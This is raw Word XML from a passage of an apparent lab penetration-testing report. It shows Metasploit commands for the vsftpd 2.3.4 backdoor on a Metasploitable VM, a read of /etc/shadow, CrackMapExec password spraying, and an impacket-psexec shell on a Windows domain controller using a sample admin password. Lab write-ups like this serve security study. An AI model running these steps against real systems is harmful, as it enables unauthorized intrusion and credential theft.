          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2550C72F"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ls -la /var/www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68950041" w14:textId="77777777" w:rsidR="00236891" w:rsidRDefault="00236891"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6B8065E3" w14:textId="77777777" w:rsidR="00236891" w:rsidRPr="00A000BA" w:rsidRDefault="00236891"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3A502512" w14:textId="1A808224" w:rsidR="0043542B" w:rsidRDefault="00236891" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00236891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F0D6DFA" wp14:editId="0209523A">
            <wp:extent cx="5943600" cy="3034030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1800028567" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F60AE8-CB32-4590-A44E-3A04E9CB96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28567" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3034030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0043542B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F5F69A" w14:textId="5E293493"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sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.2 Exploit B: Legacy Service Exploitation (Metasploitable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202487D" w14:textId="033AA992"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5.2.1 Service Discovery and Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3B56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Network scanning of Metasploitable (192.168.227.129) revealed extensive attack surface comprising outdated services with publicly documented vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F723F80"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3CFAF5AE" w14:textId="19960D35"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nmap</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sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A -p- 192.168.227.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AFE86F" w14:textId="3F9F8D7D" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00F6106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6106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F14C2A1" wp14:editId="2941C720">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="474654042" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE40C8CA-1E7C-4CA2-998E-A4666A79FB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54042" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174A418" w14:textId="710D94A2"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5.2.2 Exploitation of vsftpd 2.3.4 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C8084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The vsftpd 2.3.4 service contained a deliberately introduced backdoor vulnerability (CVE-2011-2523) permitting unauthenticated remote code execution through malformed username authentication [25].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF2A1A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 xml:space="preserve">Metasploit Framework </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Utilisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3041EF"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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F5E457E"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use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9CBA2E"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set RHOSTS 192.168.227.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F5485"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set LHOST 192.168.227.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A5C0B"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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80BAF6" w14:textId="1EA7302A" w:rsidR="004859A7" w:rsidRPr="000C1615" w:rsidRDefault="00100EEB"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100EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49C757A7" wp14:editId="6C53C657">
            <wp:extent cx="5943600" cy="2935605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1098550700" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF8725E5-9631-40BA-88C7-0A41A962CE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50700" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2935605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1680CD43" w14:textId="23DDCFFC"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Privilege Verification</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F3DC8"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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09021593"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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30025BCE"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cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/shadow | head -5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779416F" w14:textId="77777777" w:rsidR="000C1615" w:rsidRDefault="000C161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559086E1" w14:textId="6E9B3758" w:rsidR="000C1615" w:rsidRPr="00A000BA" w:rsidRDefault="000C161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0C1615">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53A725A1" wp14:editId="1C0E2BF3">
            <wp:extent cx="5943600" cy="3122295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1043253700" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E57F1207-1F91-46DC-984B-778B76183A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53700" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3122295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8E66F" w14:textId="77777777" w:rsidR="00CB2C98" w:rsidRDefault="00CB2C98"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0AFA384D" w14:textId="4CF51B7A"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sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.3 Exploit C: Windows Domain Compromise (Windows Server 2019)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E8830" w14:textId="146EAA83"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5.3.1 Initial Access via Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB6557" w14:textId="17C67B09"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Credential-based attack against the Windows Server 2019 Active Directory infrastructure commenced with username enumeration followed by password spraying techniques [2</w:t>
      </w:r>
      <w:r w:rsidR="00424DAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2052820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Password Spraying Attack</w:t>
      </w:r>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Utilising</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CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> for distributed authentication attempts against identified user accounts with commonly employed passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18533524" w14:textId="1BB7895F"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crackmapexec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smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.227.13</w:t>
      </w:r>
      <w:r w:rsidR="00515A10">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u users.txt -p Password</w:t>
      </w:r>
      <w:r w:rsidR="00D67D43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> --continue-on-success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A9479F" w14:textId="77777777" w:rsidR="00D67D43" w:rsidRDefault="00D67D43"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43D0C9F7" w14:textId="1623636A" w:rsidR="00D67D43" w:rsidRPr="00A000BA" w:rsidRDefault="00D67D43"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D67D43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A99C0B" wp14:editId="136F1280">
            <wp:extent cx="5943600" cy="1678305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1568874616" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB3C654-8F5B-4A58-8119-CA6BB0019F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74616" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1678305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="334FE789" w14:textId="148D5935"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5.3.2 Remote Access via SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7235AF" w14:textId="32E8A34F"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Validated credentials facilitated remote administrative access through SMB protocol </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>utilising</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PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-style command execution [2</w:t>
      </w:r>
      <w:r w:rsidR="004F48E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078235EC"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295B4CD1" w14:textId="59D3683B"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crackmapexec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smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.227.13</w:t>
      </w:r>
      <w:r w:rsidR="00D67D43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r w:rsidR="0093252F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator </w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-p '</w:t>
      </w:r>
      <w:r w:rsidR="0093252F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Admin@123</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>' -x '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9EBC9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[Insert Screenshot Here — Remote command execution showing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>abcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>jsmith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> user context]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB62F26"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Interactive Shell Establishment</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3B780E" w14:textId="004DAEB0"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impacket-psexec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abcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00B16175">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Ad</w:t>
      </w:r>
      <w:r w:rsidR="001F5F36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ministrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:'</w:t>
      </w:r>
      <w:r w:rsidR="00B16175">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Admin@123</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'@192.168.227.13</w:t>
      </w:r>
      <w:r w:rsidR="001F5F36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A729E6" w14:textId="77777777" w:rsidR="00D038B0" w:rsidRDefault="00D038B0"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144D6134" w14:textId="345F02D0" w:rsidR="00A000BA" w:rsidRPr="00027FDF" w:rsidRDefault="00D038B0"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D038B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
